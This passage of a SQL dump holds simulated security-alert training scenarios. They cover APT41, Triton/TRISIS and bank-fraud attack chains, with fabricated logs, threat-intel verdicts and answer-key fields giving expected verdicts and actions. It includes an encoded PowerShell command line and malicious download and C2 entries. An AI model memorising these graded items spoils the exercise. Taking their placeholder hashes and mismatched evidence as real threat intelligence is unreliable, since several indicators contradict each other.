4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"103.123.45.67\\\",\\\"destination_ip\\\":\\\"192.168.10.25\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"destination_country\\\":\\\"Philippines\\\",\\\"malware_hash\\\":\\\"f2c7a3a849b8f8c7a3a849b8f8c7a3a8\\\",\\\"suspected_tool\\\":\\\"WannaCry\\\",\\\"user\\\":\\\"internal_user@bank.com\\\",\\\"filename\\\":\\\"transfer_record.xlsx\\\",\\\"status\\\":\\\"Completed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(821, 'Funds Laundered via Philippine Casinos - Step 7', 'critical', 'Financial transaction monitoring', 'In the final stage of the operation, the stolen funds are laundered through Philippine casinos, making the money difficult to trace. This step involves complex transactions designed to obscure the origin of the funds.', 'Money Laundering', 'T1041 - Exfiltration Over C2 Channel', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-02T15:45:23Z\",\"transaction_id\":\"TRX789654123\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"203.160.75.123\",\"amount\":500000,\"currency\":\"USD\",\"destination_account\":\"PH-CAS-9876543210\",\"malware_hash\":\"3d7f2b8a9ecf5b2a3f5b4c6d8f9e8c1d\",\"associated_user\":\"j.smith@banklocal.com\",\"casinos_involved\":[\"ManilaCasino1\",\"CebuCasino2\"],\"attack_pattern\":\"Complex financial transactions\",\"notes\":\"Final laundering step observed with funds transferred to high-risk casino accounts.\"}', '2026-01-12 22:20:52', '2026-02-16 17:59:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used to initiate transaction.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.160.75.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Destination IP associated with high-risk gambling activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d7f2b8a9ecf5b2a3f5b4c6d8f9e8c1d\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with custom Lazarus Group malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.smith@banklocal.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"suspicious\",\"details\":\"User account linked to anomalous transactions.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.473Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T15:45:23Z\\\",\\\"transaction_id\\\":\\\"TRX789654123\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.160.75.123\\\",\\\"amount\\\":500000,\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"PH-CAS-9876543210\\\",\\\"malware_hash\\\":\\\"3d7f2b8a9ecf5b2a3f5b4c6d8f9e8c1d\\\",\\\"associated_user\\\":\\\"j.smith@banklocal.com\\\",\\\"casinos_involved\\\":[\\\"ManilaCasino1\\\",\\\"CebuCasino2\\\"],\\\"attack_pattern\\\":\\\"Complex financial transactions\\\",\\\"notes\\\":\\\"Final laundering step observed with funds transferred to high-risk casino accounts.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.473Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T15:45:23Z\\\",\\\"transaction_id\\\":\\\"TRX789654123\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.160.75.123\\\",\\\"amount\\\":500000,\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"PH-CAS-9876543210\\\",\\\"malware_hash\\\":\\\"3d7f2b8a9ecf5b2a3f5b4c6d8f9e8c1d\\\",\\\"associated_user\\\":\\\"j.smith@banklocal.com\\\",\\\"casinos_involved\\\":[\\\"ManilaCasino1\\\",\\\"CebuCasino2\\\"],\\\"attack_pattern\\\":\\\"Complex financial transactions\\\",\\\"notes\\\":\\\"Final laundering step observed with funds transferred to high-risk casino accounts.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.473Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T15:45:23Z\\\",\\\"transaction_id\\\":\\\"TRX789654123\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.160.75.123\\\",\\\"amount\\\":500000,\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"PH-CAS-9876543210\\\",\\\"malware_hash\\\":\\\"3d7f2b8a9ecf5b2a3f5b4c6d8f9e8c1d\\\",\\\"associated_user\\\":\\\"j.smith@banklocal.com\\\",\\\"casinos_involved\\\":[\\\"ManilaCasino1\\\",\\\"CebuCasino2\\\"],\\\"attack_pattern\\\":\\\"Complex financial transactions\\\",\\\"notes\\\":\\\"Final laundering step observed with funds transferred to high-risk casino accounts.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.473Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T15:45:23Z\\\",\\\"transaction_id\\\":\\\"TRX789654123\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.160.75.123\\\",\\\"amount\\\":500000,\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"PH-CAS-9876543210\\\",\\\"malware_hash\\\":\\\"3d7f2b8a9ecf5b2a3f5b4c6d8f9e8c1d\\\",\\\"associated_user\\\":\\\"j.smith@banklocal.com\\\",\\\"casinos_involved\\\":[\\\"ManilaCasino1\\\",\\\"CebuCasino2\\\"],\\\"attack_pattern\\\":\\\"Complex financial transactions\\\",\\\"notes\\\":\\\"Final laundering step observed with funds transferred to high-risk casino accounts.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.473Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T15:45:23Z\\\",\\\"transaction_id\\\":\\\"TRX789654123\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.160.75.123\\\",\\\"amount\\\":500000,\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"PH-CAS-9876543210\\\",\\\"malware_hash\\\":\\\"3d7f2b8a9ecf5b2a3f5b4c6d8f9e8c1d\\\",\\\"associated_user\\\":\\\"j.smith@banklocal.com\\\",\\\"casinos_involved\\\":[\\\"ManilaCasino1\\\",\\\"CebuCasino2\\\"],\\\"attack_pattern\\\":\\\"Complex financial transactions\\\",\\\"notes\\\":\\\"Final laundering step observed with funds transferred to high-risk casino accounts.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(822, 'Initial Compromise via CCleaner', 'high', 'Network Traffic Analysis', 'APT41 leveraged a supply chain attack by distributing a compromised version of CCleaner, a trusted software, to gain initial access to systems. The attack was identified through unusual network traffic patterns, confirming the presence of a known malicious hash associated with the CCleaner supply chain attack.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:34:29Z\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTP\",\"url\":\"http://malicious-update.com/ccleaner.exe\",\"downloaded_file_hash\":\"b2f5ff47436671b6e533d8dc3614845d\",\"username\":\"jdoe\",\"filename\":\"ccleaner.exe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"event_type\":\"download\",\"event_description\":\"User downloaded a compromised version of CCleaner.\"}', '2026-01-12 22:25:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelligencePlatform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous supply chain attacks by APT41.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b2f5ff47436671b6e533d8dc3614845d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a malicious version of CCleaner.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-update.com/ccleaner.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"URL known to distribute malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(823, 'Deployment of Second-Stage Payload', 'high', 'Endpoint Detection and Response', 'APT41 executed a second-stage payload on high-value technology companies, targeting specifically chosen entities for espionage.', 'Targeted Espionage', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_id\":\"EID-20231001-5678\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"192.168.1.100\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"filename\":\"payload.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"jdoe\",\"host_ip\":\"10.0.0.25\",\"network_segment\":\"corporate\",\"action\":\"Executed\",\"description\":\"The second-stage payload was executed successfully on the targeted host.\"}', '2026-01-12 22:25:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT41 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by APT41.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware associated with APT41 activity.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"suspicious\",\"details\":\"Unusual file execution detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(824, 'Exfiltration of Sensitive Data', 'critical', 'Data Loss Prevention Systems', 'After establishing a foothold in the target networks, APT41 began exfiltrating sensitive data, highlighting the operation\'s true espionage objective amid the larger attack. The exfiltration was detected through anomalous data transfer patterns from internal servers to an external IP address.', 'Data Breach', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:27:32Z\",\"source_ip\":\"10.12.45.67\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"filename\":\"financial_report_q3_2023.xlsx\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_id\":\"EXFIL1234\",\"description\":\"Detected unauthorized data transfer to external IP\",\"protocol\":\"HTTPS\",\"bytes_transferred\":10485760}', '2026-01-12 22:25:20', '2026-02-16 17:58:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with APT41.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.12.45.67\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Legitimate user credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File System Logs\",\"verdict\":\"clean\",\"details\":\"Sensitive file containing proprietary financial data.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious signatures associated with this hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.477Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:32Z\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_id\\\":\\\"EXFIL1234\\\",\\\"description\\\":\\\"Detected unauthorized data transfer to external IP\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760}\"},{\"timestamp\":\"2026-02-01T20:31:22.477Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:32Z\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_id\\\":\\\"EXFIL1234\\\",\\\"description\\\":\\\"Detected unauthorized data transfer to external IP\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760}\"},{\"timestamp\":\"2026-02-01T20:30:22.477Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:32Z\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_id\\\":\\\"EXFIL1234\\\",\\\"description\\\":\\\"Detected unauthorized data transfer to external IP\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760}\"},{\"timestamp\":\"2026-02-01T20:29:22.477Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:32Z\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_id\\\":\\\"EXFIL1234\\\",\\\"description\\\":\\\"Detected unauthorized data transfer to external IP\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760}\"},{\"timestamp\":\"2026-02-01T20:28:22.477Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:32Z\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_id\\\":\\\"EXFIL1234\\\",\\\"description\\\":\\\"Detected unauthorized data transfer to external IP\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(825, 'Initial Access via Phishing Email', 'high', 'Email Gateway Logs', 'The attackers initiated their operation by sending a spear-phishing email to the employee, attempting to steal credentials and gain a foothold in the network. The email contained a malicious attachment intended to execute a payload if opened.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-08T14:22:34Z\",\"email_subject\":\"Urgent: Update Your Account Information\",\"sender_email\":\"john.doe@maliciousdomain.com\",\"recipient_email\":\"jane.smith@company.com\",\"attachment_name\":\"Invoice_Update.pdf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"sender_ip\":\"203.0.113.45\",\"recipient_ip\":\"192.168.1.10\",\"headers\":{\"User-Agent\":\"Mozilla/5.0\",\"X-Mailer\":\"PHPMailer 6.1\"}}', '2026-01-13 01:52:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Domain associated with previous phishing attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"IP address flagged for distributing phishing emails.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with known malicious PDF files.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Email\",\"date\":\"2026-02-01T20:32:22.478Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(826, 'Execution of Malware Payload', 'high', 'Endpoint Detection and Response (EDR)', 'Attackers executed the Triton/TRISIS payload on a compromised host within the plant network. This action aims to manipulate safety systems stealthily.', 'Malware Deployment', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"event_id\":\"EDR-20231015-00123\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"10.20.30.40\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"process_name\":\"triton_deploy.exe\",\"file_hash\":\"9f2d3c2b4a7d8e9f1a3b5c7d8e9f0b3c\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\triton_deploy.exe\",\"action\":\"Execution\",\"result\":\"Success\"}', '2026-01-13 01:52:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Triton/TRISIS activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9f2d3c2b4a7d8e9f1a3b5c7d8e9f0b3c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with Triton/TRISIS.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"triton_deploy.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable file linked to Triton/TRISIS deployment.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(827, 'Establishing Persistence', 'medium', 'Network Traffic Analysis', 'An unusual outbound connection was detected from an internal host to a known malicious IP address. Further analysis revealed the installation of a backdoor that allows persistent access to the compromised system.', 'Backdoor Installation', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"src_ip\":\"192.168.10.15\",\"dst_ip\":\"203.0.113.56\",\"protocol\":\"TCP\",\"dst_port\":4444,\"filename\":\"persistence_backdoor.exe\",\"hash\":\"a1b2c3d4e5f67890123456789abcdef0\",\"user\":\"jdoe\",\"event\":\"Outbound connection detected\",\"threat_level\":\"medium\",\"description\":\"Outbound traffic from internal host to a known malicious IP associated with backdoor activity.\"}', '2026-01-13 01:52:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple backdoor campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known backdoor malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"persistence_backdoor.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAnalysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual executable name for user jdoe.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(828, 'Lateral Movement to SIS Controllers', 'high', 'Internal Network Logs', 'The attackers, having established persistence on the network, are attempting lateral movement targeting Triconex SIS controllers. This step involves the use of known malicious IPs and tools to gain access to critical safety systems.', 'Network Propagation', 'T1021 - Remote Services', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:30Z\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"10.0.0.50\",\"external_ip\":\"203.0.113.45\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"triconex_exploit.exe\",\"username\":\"admin_sis\",\"event\":\"connection_attempt\",\"status\":\"allowed\",\"description\":\"Connection attempt from internal workstation to SIS controller using known malware tool.\"}', '2026-01-13 01:52:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with compromised 